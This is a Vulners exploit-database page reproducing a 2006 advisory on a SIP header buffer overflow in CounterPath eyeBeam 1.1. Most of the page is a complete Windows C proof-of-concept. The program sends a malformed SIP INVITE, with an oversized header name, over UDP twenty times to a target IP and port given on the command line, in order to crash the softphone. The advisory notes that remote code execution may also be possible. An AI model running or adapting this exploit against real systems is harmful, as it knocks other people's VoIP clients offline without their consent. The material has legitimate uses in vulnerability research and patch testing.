Vulners
Lucene search
CounterPath eyeBeam 1.1 build 3010n SIP Header Data Remote Buffer Overflow Vulnerability (2)
source: http://www.securityfocus.com/bid/16253/info
A remote buffer-overflow vulnerability affects CounterPath eyeBeam because the application fails to properly validate the length of user-supplied strings prior to copying them into static process buffers.
An attacker may exploit this issue to crash the affected application. Presumably, remote arbitrary code execution may also be possible. This may facilitate unauthorized access or privilege escalation.
Information regarding specific versions affected is currently unavailable. This BID will be updated as further information is disclosed. Note that the eyeBeam package has been re-branded and redistributed by other vendors.
/*********************************************************
eyeBeam handling SIP header DOS POC
Author : ZwelL
Email : [email protected]
Blog : http://www.donews.net/zwell
Data : 2006.1.15
*********************************************************/
#include <stdio.h>
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
char *sendbuf1 =
"INVITE sip:[email protected] SIP/2.0\r\n"
"Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK00001249z9hG4bK.00004119\r\n"
"From: test <sip:[email protected]>;tag=1249\r\n"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaa: test <sip:[email protected]>\r\n";
char *sendbuf2 =
"CSeq: 18571 INVITE\r\n"
"Expires: 1200\r\n"
"Max-Forwards: 70\r\n"
"Content-Type: application/sdp\r\n"
"Content-Length: 130\r\n"
"\r\n"
"v=0\r\n"
"o=1249 1249 1249 IN IP4 127.0.0.1\r\n"
"s=Session SDP\r\n"
"c=IN IP4 127.0.0.1\r\n"
"t=0 0\r\n"
"m=audio 9876 RTP/AVP 0\r\n"
"a=rtpmap:0 PCMU/8000\r\n";
int main(int argc, char **argv)
{
WSADATA wsaData;
SOCKET sock;
sockaddr_in RecvAddr;
char sendbuf[4096];
int iResult;
int port = 8376; //default is 8376, but SIP's default port is 5060
printf("eyeBeam handling SIP header DOS POC\nAuthor : ZwelL\n");
printf("Email : [email protected]\nBlog : http://www.donews.net/zwell\n\n");
if(argc < 2)
{
printf("Usage : %s <target ip> [port]\n", argv[0]);
return 0;
}
if(argc == 3)
port = atoi(argv[2]);
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
if (iResult != NO_ERROR)
{
printf("Error at WSAStartup()\n");
return 0;
}
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
ZeroMemory(&RecvAddr, sizeof(RecvAddr));
RecvAddr.sin_family = AF_INET;
RecvAddr.sin_port = htons((short)port);
RecvAddr.sin_addr.s_addr = inet_addr(argv[1]);
printf("Target is : %s\t port is : %d\r\n", argv[1], port);
for(int i=0; i<20; i++)
{
sprintf(sendbuf, "%sCall-ID: 4166@<%s>\r\n%s", sendbuf1, argv[1], sendbuf2);
if(SOCKET_ERROR == sendto(sock,
sendbuf,
strlen(sendbuf),
0,
(SOCKADDR *) &RecvAddr,
sizeof(RecvAddr)))
{
printf("sendto wrong:%d\n", WSAGetLastError());
continue;
}
}
printf("Now check the target is crafted?\r\n");
WSACleanup();
return 1;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1